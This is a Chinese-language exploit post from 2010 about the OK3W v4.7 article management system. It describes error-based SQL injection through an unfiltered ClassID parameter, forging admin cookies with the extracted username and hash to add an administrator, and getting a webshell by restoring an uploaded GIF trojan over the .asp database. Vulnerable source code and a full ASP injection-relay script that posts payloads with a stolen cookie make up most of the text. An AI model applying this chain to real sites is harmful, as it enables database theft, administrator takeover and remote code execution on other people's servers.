|
OK3W v4.7文章管理系统漏洞
|
|
来源:vfocus.net 作者:3x 发布时间:2010-01-25
|
|
by 3x
OK3W是一套文章管理系统,整套系统的程序结构是以自定义类来实现的,很有创意o(∩_∩)o...
安全性还是比较好的,目前免费版4.7存在这个漏洞,官网也存在,不过不知道补了没,上次路过被发现了
后台验证过程: 本来我看到这里以为可以好不费力的拿下,基础过过关,这里登陆验证虽然是采用cookies验证,但是sql语句是用预编译的方式进行查询的,所以单引号这里是没用的,不能用万能密码。(感谢ninty大牛指点)
所以我们只能注入拿到密码了
看了他的加密方式,加密一次md5(32),取前16个字符,后16个字符分别加密md5(16),再合并(好像是这样的,反正就是解不出来)
只能拿到密码的密文和用户名进行cookies欺骗了
漏洞文件:
user_index.asp
调用了article类中的
下面段代码 不过好像不知道再哪个文件调用中又把classid给cint掉了,所以实验中发现
id=1 and 1=1 报错:类型不匹配
id=1 and 1=2 报错:找不到结果集
只能根据报错信息来注入了,也就是说,要注入必须要报错,服务器屏蔽了错误信息就没办法注入了
注入过程:
注册一个用户,登陆,得到cookies 修改完之后,注入地址 url/jmdcw.asp?jmdcw=123 or 1=1
表名为ok3w_admin
字段adminname,adminpwd
得到账号和密码后
伪造cookies
Ok3w=AdminPwd=be4b3b08e33d66fc8b2759a05bf4e10e&AdminName=admin&GroupId=%2C1%2C2%2C3%2C4%2C5%2C6%2C&AdminId=16
把
adminpwd后面的改成密文
adminname后面的改成用户名
伪造cookies后
访问 url/admin/sys_admin.asp 就可以增加一个新的管理员
----------------------------------------------------------------------------------------------------------
进入后台
数据库一般为asp格式的,有notdown表
上传无漏洞
备份功能:
被备份的原文件只能是原数据库,不能更改,更改的也没用
还原功能:
还原后的路径也不能更改,更改了也没用,这里可以得到数据库地址
利用:
先把原数据库备份,上传一个gif马,利用还原功能,还原成源数据库地址(一般为asp,不是asp就没戏了),得到shell
这时侯网站会访问不了,进入后请把备份数据库还原
01 Public Function AdminIsLogin()
02 If Trim(AdminName) = "" Then
03 AdminIsLogin = 0’没有登陆
04 Else
05 If AdminLogin(AdminName,AdminPwd,"IsCheck")<>-1 Then
06 AdminIsLogin = 0’Cookies错误
07 Else
08 AdminIsLogin = -1’已经登陆
09 End If
10 End If
11 End Function
12
13 Public Function AdminLogin(sAdminName,sAdminPwd,sType)
14 AdminName = sAdminName
15
16 Sql = "select * from Ok3w_Admin where AdminName=? and AdminPwd=?"
17 Set AdminCmd = Server.CreateObject("Adodb.Command")
18 AdminCmd.ActiveConnection = Conn
19 AdminCmd.CommandType = 1
20 AdminCmd.CommandText = Sql
21 AdminCmd.Parameters.Append(AdminCmd.CreateParameter("@AdminName",200,1,50,sAdminName))
22 AdminCmd.Parameters.Append(AdminCmd.CreateParameter("@AdminPwd",200,1,50,sAdminPwd))
23 Set AdminRs = Server.CreateObject("Adodb.RecordSet")
24 Set AdminRs = AdminCmd.Execute
25 response.write sAdminName&" "&sAdminPwd&""
26 response.write AdminCmd.CommandText
27 Set AdminCmd = Nothing
28
29 If AdminRs.Eof And AdminRs.Bof Then
30 AdminLogin = 1’用户名或密码错误
31
32 Else
33 If AdminRs("AdminLock") Then
34 AdminLogin = 2’用户被锁定
35 Else
36 Response.Cookies("Ok3w")("AdminId") = AdminRs("AdminId")
37 Response.Cookies("Ok3w")("AdminName") = AdminRs("AdminName")
38 Response.Cookies("Ok3w")("AdminPwd") = AdminRs("AdminPwd")
39 Response.Cookies("Ok3w")("GroupId") = AdminRs("GroupId")
40
41 If sType="IsLogin" Then Call AdminActionLog("成功登陆")
42 AdminLogin = -1’成功登陆
43 End If
44 End If
45 AdminRs.Close
46 Set AdminRs = Nothing
47 response.write adminlogin
48 End Function
01 Private Sub GetFormData()
02 Id = Request.QueryString("Id")
03 If Id = "" Then Id=GetMaxArticleID()+1
04 ChannelID = Request.QueryString("ChannelID")
05 ClassID = Request.Form("ClassID")
06 If ClassID="" Then
07 ClassID = -1
08 SortPath = ""
09 Else
10 SortPath = Conn.Execute("select SortPath from Ok3w_Class where ID=" & ClassID)(0) ’ 这里没过滤classid
11 End If
12 Title = Request.Form("Title")
13 TitleColor = Request.Form("TitleColor")
14 TitleURL = Request.Form("TitleURL")
15 Keywords = Request.Form("Keywords")
16 Description = Request.Form("Description")
17
18 For i = 1 To Request.Form("Content").Count
19 Content = Content & Request.Form("Content")(i)
20 Next
21 If Request.Form("eWebEditorUpFile") = "1" Then
22 ePATH_INFO = Request.ServerVariables("PATH_INFO")
23 eTmp = Split(ePATH_INFO,"/")
24 ePATH_INFO = ""
25 For ee=0 To Ubound(eTmp)-2
26 ePATH_INFO = ePATH_INFO + eTmp(ee) + "/"
27 Next
28 Content = Replace(Content,"../upfiles/","upfiles/")
29 Content = Replace(Content,"../editor/","editor/")
30 Content = Replace(Content,ePATH_INFO & "upfiles/","upfiles/")
31 Content = Replace(Content,ePATH_INFO & "editor/","editor/")
32 End If
33
34 Author = Request.Form("Author")
35 ComeFrom = Request.Form("ComeFrom")
36 AddTime = Request.Form("AddTime")
37 Inputer = Request.Form("Inputer")
38 If Inputer="" Then Inputer = Admin.AdminName
39 IsPass = Request.Form("IsPass")
40 If IsPass = "" Then IsPass = 0
41 IsPic = Request.Form("IsPic")
42 If IsPic = "" Then IsPic = 0
43 PicFile = Request.Form("PicFile")
44 IsTop = Request.Form("IsTop")
45 If IsTop = "" Then IsTop = 0
46 IsCommend = Request.Form("IsCommend")
47 If IsCommend = "" Then IsCommend = 0
48 IsDelete = Request.Form("IsDelete")
49 If IsDelete = "" Then IsDelete = 0
50 IsMove = Request.Form("IsMove")
51 If IsMove = "" Then IsMove = 0
52 IsPlay = Request.Form("IsPlay")
53 If IsPlay = "" Then IsPlay = 0
54 IsIndexImg = Request.Form("IsIndexImg")
55 If IsIndexImg = "" Then IsIndexImg = 0
56 IsUserAdd = Request.Form("IsUserAdd")
57 If IsUserAdd = "" Then IsUserAdd = 0
58 GiveJifen = Request.Form("GiveJifen")
59 If GiveJifen = "" Then GiveJifen = 0
60 vUserGroupID = Request.Form("vUserGroupID")
61 If vUserGroupID = "" Then vUserGroupID = 0
62 vUserMore = Request.Form("vUserMore")
63 If vUserMore = "" Then vUserMore = 0
64 vUserJifen = Request.Form("vUserJifen")
65 If vUserJifen = "" Then vUserJifen = 0
66 pMoodStr = Request.Form("pMoodStr")
67 If pMoodStr = "" Then pMoodStr = "0,0,0,0,0,0,0,0"
68 Hits = Request.Form("Hits")
69 End Sub
01 ]<%
02 JmdcwName=request("jmdcw")
03 ’ 注入中转站 POST 版,BY 寂寞的刺猬 [L.S.T]
04 JmStr="Title=111&Content=111111&UpFiles=&ComeFrom=%CE%D2%B5%C4%CD%F8%D5%BE&Author=%CE%D2%B5%C4%CD%F8%D5%BE&ClassID="&JmdcwName
05 JMUrl="http://localhost/User_Index.asp?a=a_edit&b=save&a_id=28" ’把localhost改为网址你的网址
06 JmRef="http://127.0.0.1/6kbbs/bank.asp"
07 JmCok="Ok3w=User%5FPassword=ed64d3bd1ad013789c2e6ee373a96d8b&User%5FName=gogolrq" ’把这里换成你的cookies
08 JmCok=replace(JmCok,chr(32),"%20")
09 JmStr=URLEncoding(JmStr)
10
11 response.write PostData(JMUrl,JmStr,JmCok,JmRef)
12
13 Function PostData(PostUrl,PostStr,PostCok,PostRef)
14 Dim Http
15 Set Http = Server.CreateObject("msxml2.serverXMLHTTP")
16 With Http
17
18 .Open "POST",PostUrl,False
19 .SetRequestHeader "Content-Length",Len(PostStr)
20 .SetRequestHeader "Content-Type","application/x-www-form-urlencoded"
21 .SetRequestHeader "Referer",PostRef
22 .SetRequestHeader "Cookie",PostCok
23 .Send PostStr
24 PostData = .ResponseBody
25 End With
26 Set Http = Nothing
27 PostData =bytes2BSTR(PostData)
28 End Function
29
30 Function bytes2BSTR(vIn)
31 Dim strReturn
32 Dim I, ThisCharCode, NextCharCode
33 strReturn = ""
34 For I = 1 To LenB(vIn)
35 ThisCharCode = AscB(MidB(vIn, I, 1))
36 If ThisCharCode < &H80 Then
37 strReturn = strReturn & Chr(ThisCharCode)
38 Else
39 NextCharCode = AscB(MidB(vIn, I + 1, 1))
40 strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
41 I = I + 1
42 End If
43 Next
44 bytes2BSTR = strReturn
45 End Function
46
47 Function URLEncoding(vstrin)
48 strReturn=""
49 Dim i
50 For i=1 To Len(vstrin)
51 ThisChr=Mid(vstrin,i,1)
52 if Abs(Asc(ThisChr))< &HFF Then
53 strReturn=strReturn & ThisChr
54 Else
55 InnerCode=Asc(ThisChr)
56 If InnerCode<0 Then
57 InnerCode=InnerCode + &H10000
58 End If
59 Hight1=(InnerCode And &HFF00) \&HFF
60 Low1=InnerCode And &HFF
61 strReturn=strReturn & "%" & Hex(Hight1) & "%" & Hex(Low1)
62 End if
63 Next
64 strReturn=Replace(strReturn,chr(32),"%20") ’转换空格,如果网站过滤了空格,尝试用/**/来代替%20
65 strReturn=Replace(strReturn,chr(43),"%2B") ’JMDCW增加转换+字符
66 ’strReturn=Replace(strReturn,过滤字符,"转换为字符") ’在此增加要过滤的代码
67 URLEncoding=strReturn
68 End Function
69
70 %>
|
| |
|
[ 推荐]
[ 评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
| |
|
|
 |
|
推荐广告 |
|
|
|
|
|
